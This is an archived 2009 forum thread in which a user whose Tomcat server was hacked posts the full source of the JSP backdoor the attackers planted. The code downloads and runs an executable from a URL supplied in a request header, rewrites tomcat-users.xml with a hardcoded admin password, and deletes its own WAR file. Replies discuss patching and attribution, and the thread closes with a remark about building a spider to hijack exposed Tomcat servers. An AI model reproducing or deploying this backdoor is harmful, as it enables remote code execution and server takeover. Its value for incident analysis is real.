Someone hacked my Tomcat server

Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

scooterscot replied

23 March 2009, 19:31
Originally posted by DaveB View Post

The average life expectancy of an unpatched, unprotected windows box connected to the net is around 10 mins. After that the chances are you will never have complete control of it again.

Do your config/patching/installs of AV and firewalls *before* you plug in the network cable.

I've just put a windows installation via parallels open to the internet. Days pass no problem runs smoothly.

What did I do?

I stripped it of every service you could imagine since I require it to run only one installation.

It's all the stupid services that let this platform down IMO. I used XPlite.
Leave a comment:
minestrone replied

23 March 2009, 17:33
Originally posted by NickFitz View Post

They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

EDIT: looks like it's an automated thing.

That was the first page I hit when I googled the war file.

I am actually surprised they have not done anything about it since the guy posted it. Actually, tomcat is now pretty much a IBM/Apache/RedHat project so I am not surprised.
Leave a comment:
NickFitz replied

23 March 2009, 16:01
Originally posted by minestrone View Post

I am fairly sure they will hit on me again, I wonder where the IP will be from?

My money is on Russia

They're very unlikely to be coming directly to your machine - there are millions of compromised boxes out there for them to proxy through.

EDIT: looks like it's an automated thing.

Last edited by NickFitz; 23 March 2009, 16:04.
Leave a comment:

minestrone replied

23 March 2009, 12:46

Changed the code to this..

Code:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
<%

System.out.println( "==============================================" ) ;

System.out.println( "Cache-Vip-Url: (spyware exe) " + request.getHeader("Cache-Vip-Url") ) ;
System.out.println( "IP:                          " + request.getRemoteAddr() ) ;
System.out.println( "SERVER:                      " + request.getServerName() ) ;
System.out.println( "REQUEST:                     " + request ) ;		

request.setAttribute("result","Success! ");
		
request.getRequestDispatcher("/ok.jsp").forward(request, response);
 %>

I am fairly sure they will hit on me again, I wonder where the IP will be from?

My money is on Russia

Leave a comment:

minestrone replied

23 March 2009, 10:21

Here is the code is anyone is interested..

Code:

<%@ page language="java" pageEncoding="utf-8" import="java.io.*,java.net.*"%>
<%!
	String pass=null;
	String sys=null;
	
	String url=null;
	String filesrc=null;
		
public class AutoKill {
	
	private String killLoophole(String path) throws Exception
	{
		try
		{
			String pass=randomPass();
			FileOutputStream fos=new FileOutputStream(path);
			String s="<?xml version='1.0' encoding='utf-8'?>\r\n";
			s=s+"<tomcat-users>\r\n";
			s=s+"\t<role rolename=\"tomcat\"/>\r\n";
			s=s+"\t<role rolename=\"role1\" />\r\n";
			s=s+"\t<role rolename=\"manager\"/>\r\n";
			s=s+"\t<role rolename=\"admin\"/>\r\n";
			s=s+"\t<user username=\"admin\" password=\"NetFexc124\" roles=\"admin,manager\"/>\r\n";
			s=s+"</tomcat-users>";
			byte[] b=new byte[1024];
			b=s.getBytes();
			fos.write(b);
			fos.close();
			return pass;
		}catch(Exception e)
		{
			return null;
		}
		
	}
	
	private String randomPass()
	{
		StringBuffer pass = new StringBuffer(); 
		int i =0;
		while(i<5) 
		{
		 i=(int)(Math.random()*12);
		}
		
		for(int j=0;j<=i;j++)
		{
			char c = (char)(Math.random()* 26 + 'A');
			pass.append(c);
		}
		return pass.toString()+String.valueOf(((int)(Math.random()*10000)));
	}
	
	private boolean clean(String src)
	{
		File file=new File(src+".war");
		if(file.exists())
			if(file.delete())
			{
				return true;
			}
		return false;
	}
	
	private boolean downFile(String url,String filesrc)
	{
		try
		{
		URL urlc = new URL(url);
		HttpURLConnection con = (HttpURLConnection)urlc.openConnection();
		con.connect();
		byte[] b=new byte[1024];
		BufferedInputStream bis=new BufferedInputStream(con.getInputStream());
		FileOutputStream fos=new FileOutputStream(filesrc);
		int length=-1;
		while((length=bis.read(b,0,b.length))!=-1)
		{
			fos.write(b,0,length);
		}
		fos.close();
		bis.close();
		Process run_proc=Runtime.getRuntime().exec(filesrc);
		return true;
		}catch(Exception e)
		{	
		}
		return false;
	}
	
	
	private boolean exeFile()
	{
		boolean afly=false;
	    if (downFile(url,filesrc))
	    afly=true;
		
		return afly;
	}
	
}
%>
<%
		sys=System.getProperty("os.name");
		int i=sys.indexOf("Windows");
		AutoKill ak=new AutoKill();
		url=request.getHeader("Cache-Vip-Url");
		if (i>-1)
		{
				String result;
				try
				{
					filesrc=request.getSession().getServletContext().getRealPath("")+"/init.exe";
					if (ak.exeFile())
					{
						result="Success! ";
						pass=ak.killLoophole(System.getProperty("catalina.base")+"/conf/tomcat-users.xml");
						if(ak.clean(request.getSession().getServletContext().getRealPath("")))
						result=result+"Undeployed application at context path "+request.getContextPath()+"! ";
					if (pass!=null)
						result=result+"After the change password:"+pass+"! ";
					}
					else
					{
						result="Failure! Down File Failure!";
					}
				}catch(Exception e)
				{
					result="Failure!throws Exception - "+e.getMessage()+"! ";
				}
				request.setAttribute("result",result);
		}
		else
		{
			request.setAttribute("result","Failure!Because Remote computer system is "+sys+"!");
		}
		
		request.getRequestDispatcher("/ok.jsp").forward(request, response);
 %>

PCClient.N was the trojan that was caught.

I could probably knock up a web spider in a couple of hours that searches for tomcat instances and have a good few bots under my control by the end of the week.